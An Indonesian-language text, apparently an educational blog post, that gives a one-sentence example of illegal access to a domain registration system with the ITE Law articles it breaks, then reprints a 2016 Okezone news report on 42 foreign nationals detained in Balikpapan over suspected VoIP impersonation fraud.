            Contoh Cyber attack pada kasus hacking dan penambahan nama domain. Pelaku tindak pidana dapat menemukan celah keamanan informasi dalam sistem Pendaftaran Nama  Domai dan kemudian menambahkan beberapa Nama Domai untuk digunakan sendiri tanpa melalui prosedur pendaftaran yang sah (memberikan KTP dan membayar).Terhadap perbuatan pelaku, dapat diancam pasal akses ilegal (pasal akses ilegal (pasal 30 UU ITE) dan perubahan data (pasal 32 UU ITE).

Kasus Cyber Crime di Indonesia :
Terlibat Cyber Crime, Puluhan WNA Diamankan
            Petugas gabungan dari Polres Balikpapan dan Imigrasi Balikpapan menggrebek rumah yang diduga sebagai tempat tindak pidana cyber crime  pada Senin 4 Maret malam.  Dari pengungkapan tersebut, petugas mengamankan 42 warga negara asing (WNA) asal Taiwan dan China. Pengungkapan itu bermula saat petugas imigrasi mendapatkan laporan dari petugas Aviation Security (Avsec) Bandara Sepinggan pad Minggu 3 April 2016. Berdasarkan laporan itu, diketahui dari 30 WNA, sebanyak 21 oramg di antaranya tidak melengkapi surat keimigrasian.
            Para WNA tersebut akan melakukan penerbangan denga tujuan Medan menggunakan pesawat Lion Air JT 933. Petugas imigrasi kemudian melakukan pemeriksaan dan penyelidikan berkoordinasi dengan Polres Balikpapan. Dari hasil penyelidikan, ada tiga WNI asal Medan yang diduga sebagai petunjuk jala para WNA tersebut. Ketiganya adalah Irawan (36), Lilian (45), dan Erwin (26). Dari keterangan mereka, masih ada 12 WNA yang berda di sebuah hotel di kawasan Jalan Gajah Mada, Kelurahan Klandasan Ilir, Balikpapan Kota.
            Selain itu, petugas mengendus rumah yang dijadikan tempat puluhan WNA tersebut melakukan aktivitas cyber crime. Operasi Penggeledahan dilakukan pada Senin 4 April sekira pukul 10:30 WITA di kawasan rumah elite diJendral Sudirman RT 19, Kelurahan Damai Bahagia, Balikpapan Selatan. Penggeledahan itu dipimpin Kapolres Balikpapan, AKBP jeffri Dian Juniarta, serta Kasat Reskrim Polres Balikpapan, AKP Kalfaris Triwijaya Lalo. Dari dalam rumah berlantai tiga tersebut, polisi mengamankan perangkat elektronik yang diduga digunakan untuk melakukan kejahatan. Berdasarkan pantauan media, diseluruh jendela dan pintu ditutupi dengan busa yang digunakan sebagai peredam suara. Jeffri mengungkapkan, para WNA tersebut diduga tindak aktivitas cyber crime dengan lokasi di indonesia.
            “Untuk tindak kejahatannya bisa dilakukan di China atau di daerah asal para WNA ini. Dia menggunakan voice internet protocol di Indonesia jadi seolah-olah mereka mengaku bisa sebagai polisi atau aparat di China lalu melakukan rangkaian kejahatan, baik penipuan atau kejahatan lainnya,” ujar Jeffri di sela-sela penggeledahan.
            Dia menuturkan, untuk sementara para WNA tersebut dititipkan di Rumah Detensi Imigrasi Balikpapan. “Sementara dikenakan Keimigrasian, saat ini kami berkoordinasi dengan Mabes Polri terkait duga cyber crime-nya,” serunya. Kasubsit Penindakana Keimigrasian, Andi Febri Rinaldi, menambahakan para WNA dikenakan Pasal 71 Huruf D UU Nomor 6 Tahun 2011 tentang Keimigrasian. “Jadi, ada 12 orang yang lengkap dokumennya, selebihnya hanaya fotokopi,” tuturnya.

Sumber : http://news.okezone.com/read/2016/04/05/340/1354126/diduga-terlibat-cyber-crime-puluhan-wna-diamankan